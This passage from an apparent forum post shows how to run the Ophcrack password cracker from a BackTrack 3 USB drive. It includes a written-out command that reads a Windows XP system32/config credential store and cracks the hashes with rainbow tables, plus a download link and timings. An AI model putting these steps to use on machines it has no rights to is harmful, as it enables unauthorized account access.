This reduced the time necessary to do the above to under 11 min!
(This in no small part due to the amount of RAM; my desktop only has 2 GB whereas my laptop has 3 GB RAM. The more, the merrier.)

Edit:

Well, goes to show that research is still your best friend!

There is an Ophcrack module available, ophcrack-3.0.lzm, which can be downloaded from http://benjy-blog.blogspot.com/2008/08/usb-windows-password-cracker-tuto.html and then placed in your BackTrack 3 modules folder.

This way, if you have a large flash drive, you can boot into BT3, run the ophcrack module, point it to your rainbow tables, and off you go!

Assuming you have downloaded the above ophcrack module and have correctly placed it in your modules folder, proceed as follows:

> Boot up in BT3F
> Open a shell and type ophcrack for the options:

Code:
ophcrack


Then type in:

Code:
ophcrack -g -d /mnt/sdb1/OPHcrack/ -t /mnt/sdb1/OPHcrack/XP_Special/ -w /mnt/sda2/WINDOWS/system32/config/

(In my case the tables are in a folder called OPHcrack on the USB drive from which BT is running, and Windows is on my sda2. Really though, just follow the command as above and you can't go wrong, but remember that the path is case sensitive!)


So as you can see, the whole process for the cracking took about 19 minutes to chunk through around 7 GB worth of tables.